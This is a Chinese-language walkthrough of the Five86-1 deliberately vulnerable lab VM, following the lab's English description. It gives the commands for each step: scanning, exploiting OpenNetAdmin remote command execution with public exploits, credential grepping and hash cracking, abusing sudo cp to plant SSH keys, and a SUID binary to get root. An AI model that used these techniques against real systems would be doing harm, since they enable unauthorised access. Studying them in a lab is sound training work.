2020-02-14 14 —— 2020-02-14 16


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
Description
Five86-1 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.

The ultimate goal of this challenge is to get root and to read the one and only flag.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.

Technical Information
Five86-1 is a VirtualBox VM built on Debian 64 bit, but there shouldn't be any issues running it on most PCs.

Five86-1 has been tested successfully on VMWare Player, but if there are any issues running this VM in VMware, have a read through of this.

It is currently configured for Bridged Networking, however, this can be changed to suit your requirements. Networking is configured for DHCP.

Installation is simple - download it, unzip it, and then import it into VirtualBox or VMWare and away you go.

Important
While there should be no problems using this VM, by downloading it, you accept full responsibility for any unintentional damage that this VM may cause.

In saying that, there shouldn't be any problems, but I feel the need to throw this out there just in case.

Credits
A big thanks goes out to the members of @m0tl3ycr3w.

Contact
I'm also very interested in hearing how people go about solving these challenges, so if you're up for writing a walkthrough, please do so and send me a link, or alternatively, follow me on Twitter, and DM me (you can unfollow after you've DM'd me if you'd prefer).

I can be contacted via Twitter - @Five86_x


1
2
Kali : 192.168.56.109
目标网段 : 192.168.56.1/24

信息收集


主机存活:

1
$ nmap -s -sn -T5 -v 192.168.56.1/24 | grep -B 1 "Host is up"

扫服务:

1
$ nmap -n -Pn -sV -O 192.168.56.114

1
2
3
4
PORT      STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
80/tcp open http Apache httpd 2.4.38 ((Debian))
10000/tcp open http MiniServ 1.920 (Webmin httpd)



访问 80 端口,无有价值信息

例行扫目录:

1
dirsearch.py -u http://192.168.56.114 -e php --random-agents


经访问:

1
2
3
4
5
6
7
8
9
10
11
########################
[14:35:21] 200 - 30B - /index.html # 404
[14:35:25] 401 - 461B - /reports # need user|passwd
[14:35:25] 401 - 461B - /reports/Webalizer/ # need user|passwd
[14:35:25] 200 - 29B - /robots.txt
#####
http://192.168.56.114/robots.txt
User-agent: *
Disallow: /ona
########################
http://192.168.56.114/ona # OpenNetAdmin


搜索相关漏洞,得到远程命令执行:

1
searchsploit opennetadmin


海滩登陆


使用 47691.sh 如果报错的话,可以先 dos2unix 转换一下格式,作者可能在 dos 环境下写的脚本




使用 MSF:

1
2
3
4
5
# 先复制到桌面
cp /usr/share/exploitdb/exploits/php/webapps/47772.rb ~/Desktop/

# 复制到 MSF 内利用
cp 47772.rb /usr/share/metasploit-framework/modules/exploits/


测试发现存在 Python 使用交互式 shell

1
2
3
> shell

python -c "import pty;pty.spawn('/bin/bash')"

先看 /etc/passwd 有多少用户及有价值信息。目录全无访问权



这个时就需要最后的搜刮一下,得到了一组用户密码。其他用户,无有价值信息:

1
grep -ri --color=auto --exclude-dir=proc/ 'douglas' / 2>/dev/null




Hash 破解,没跑成来,查了一下,会用到作者给的提示 aefhrt。使用 crunch 生产字典:

1
john --wordlist=/usr/share/wordlists/rockyou.txt hash

1
2
3
4
5
6
7
8
9
$ crunch 10 10 aefhrt >word.txt

# or
$ crunch 10 10 aefhrt -o word.txt

$ john --wordlist=word.txt hash
$ john --show hash

?:fatherrrrr


身份切换(SSH免密登陆)


登录 SSH,得到普通用户,目录下除了 .ssh/ 外无其他有价值信息。

可使用的 sudo 命令为 cp



涉及知识的盲区了,特地去查询记录了一下


cp 命令可以配合 SSH(authorized_keys) 免密登录到其他用户:


1
2
3
4
5
6
7
8
9
10
11
12
13
14
# 为目标生成 ssh key
ssh-keygen -b 2048

# 复制生成的 id_rsa.pub 到 /tmp 下并改名为 authorized_kes
cp /home/douglas/.ssh/id_rsa.pub /tmp/authorized_kes

# 改变 authorized_kes 的权限
chmod 777 authorized_keys

# 复制到目标 .ssh/ 下
sudo -u jen /bin/cp authorized_keys /home/jen/.ssh/

# 登陆
ssh jen@127.0.0.1



说是有邮件,查看邮件,得到另一组用户名和密码,登陆成功。


权限提升


看目录,得到一个 SUID 的二进制文件,可以直接成为 root ,进 root 目录,得到 Flag






与其说是提权,不如说是作者准备好的外挂道具,让你可以一举成神,有种欲求不满的感觉,前面刚鼓起的劲,到了后面直接一键 root ,无法满足啊


不过,也是学到技能了


也可以使用如下方式:

  • 创建一个权限 777 的文件
  • 使用 find 命令查找 Jen 创建的文件
  • 使用 cp 命令,复制找到的文件 到 777 权限的 文件
  • cat 查看

1
2
# sudo -u
-u, --user=user # 以指定用户或 ID

1
sudo -u jen /bin/cp /var/mail/jen ./test